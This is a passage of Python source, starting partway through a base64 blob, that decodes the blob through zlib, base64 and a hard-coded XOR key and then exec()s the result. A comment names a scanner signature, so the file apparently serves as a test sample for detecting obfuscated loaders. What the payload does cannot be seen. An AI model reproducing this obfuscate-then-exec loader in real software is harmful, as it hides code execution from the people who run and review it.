F2eaU7M7UCLrATt8kj3FIfg4x0ZSZqI/zGTBcXnKfpiS2ft7zIDN6nB6sKiamrr1gt5697++/Pf7+I/OfPX93RKG0="
_K = bytes.fromhex("b2d09b3bde6fd4e9f1f06c74")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
